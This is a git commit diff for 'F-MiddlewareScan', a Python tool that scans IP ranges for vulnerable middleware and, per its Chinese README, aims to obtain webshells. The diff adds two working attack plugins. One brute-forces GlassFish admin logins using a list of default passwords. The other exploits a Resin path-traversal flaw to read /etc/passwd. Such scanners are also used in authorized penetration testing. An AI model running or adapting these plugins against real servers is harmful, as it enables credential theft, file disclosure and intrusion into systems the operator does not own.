Merge remote-tracking branch 'origin/master'

wolf · wolf · commit a56ab00f02cf · 2016-03-24T20:54:07.000+08:00
diff --git a/README.md b/README.md
@@ -0,0 +1,20 @@
+# F-MiddlewareScan<br>
+A vulnerability detection scripts for middleware services<br>
+<br>
+实现针对中间件的自动化检测，端口探测->中间件识别->漏洞检测->获取webshell<br>
+参数说明<br>
+-h 必须输入的参数，支持ip(192.168.1.1)，ip段（192.168.1），ip范围指定（192.168.1.1-192.168.1.254）,ip列表文件（ip.ini），最多限制一次可扫描65535个IP。<br>
+-p 指定要扫描端口列表，多个端口使用,隔开 例如：7001,8080,9999。未指定即使用内置默认端口进行扫描(80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080)<br>
+-m 指定线程数量 默认100线程<br>
+-t 指定HTTP请求超时时间，默认为10秒，端口扫描超时为值的1/2。<br>
+默认漏洞结果保存在 result.log中<br>
+<br>
+例子：<br>
+python F-MiddlewareScan.py -h 10.111.1<br>
+python F-MiddlewareScan.py -h 192.168.1.1-192.168.2.111<br>
+python F-MiddlewareScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6<br>
+<br>
+漏洞检测脚本以插件形式存在，可以自定义添加修改漏洞插件，存放于plugins目录，插件标准非常简单，只需对传入的IP，端口，超时进行操作，成功返回“YES|要打印出来的信息”即可。<br>
+新增插件需要在 plugin_config.ini配置文件中新增关联（多个漏洞插件以逗号隔开）。<br>
+中间件识别在discern_config.ini文件中配置（支持文件内容和header识别）<br>
+<br>
diff --git a/plugin_config.ini b/plugin_config.ini
@@ -2,5 +2,5 @@ tomcat|tomcat_crackpass
 weblogic|weblogic_crackpass,weblogic_unrce
 jboss|jboss_crackpass,jboss_unrce,jboss_info,jboss_head_getshell
 axis|axis_crackpass,axis_config_read,axis_info
-glassfish|glassfish_crackpass,glassfish_fileread
-resin|resin_crackpass,resin_fileread,resin_fileread2,resin_fileread3,resin_fileread4
+glassfish|glassfish_crackpass,glassfish_crackpass1,glassfish_fileread
+resin|resin_crackpass,resin_fileread,resin_fileread2,resin_fileread3,resin_fileread4,resin_fileread5
diff --git a/plugins/glassfish_crackpass1.py b/plugins/glassfish_crackpass1.py
@@ -0,0 +1,28 @@
+#coding:utf-8
+#author:wolf@future-sec
+import urllib2
+def check(host,port,timeout):
+    url = "http://%s:%d"%(host,int(port))
+    error_i=0
+    flag_list=['Just refresh the page... login will take over','GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js">','Admin Console</title>','src="/homePage.jsf"','src="/header.jsf"','src="/index.jsf"','<title>Common Tasks</title>','title="Logout from GlassFish']
+    user_list=['admin']
+    pass_list=['admin','glassfish','password','adminadmin','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','manager','root']
+    for user in user_list:
+        for password in pass_list:
+            try:
+                PostStr='j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true'%(user,password)
+                request = urllib2.Request(url+'/j_security_check?loginButton=Login',PostStr)
+                res = urllib2.urlopen(request,timeout=timeout)
+                res_html = res.read()
+            except urllib2.HTTPError,e:
+                return 'NO'
+            except urllib2.URLError,e:
+                error_i+=1
+                if error_i >= 3:
+                    return 'NO'
+                continue
+            for flag in flag_list:
+                if flag in res_html:
+                    info = '%s/index.jsf GlassFish Weak password %s:%s'%(url,user,password)
+                    return 'YES|'+info
+    return 'NO'
diff --git a/plugins/resin_fileread5.py b/plugins/resin_fileread5.py
@@ -0,0 +1,14 @@
+#coding:utf-8
+#author:wolf@future-sec
+import urllib2
+def check(host,port,timeout):
+    url = "http://%s:%d"%(host,int(port))
+    vul_url = url + "/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
+    try:
+        res_html = urllib2.urlopen(vul_url,timeout=timeout).read()
+    except:
+        return 'NO'
+    if "root:" in res_html:
+        info = vul_url + " Resin File Read Vul"
+        return 'YES|'+info
+    return 'NO'
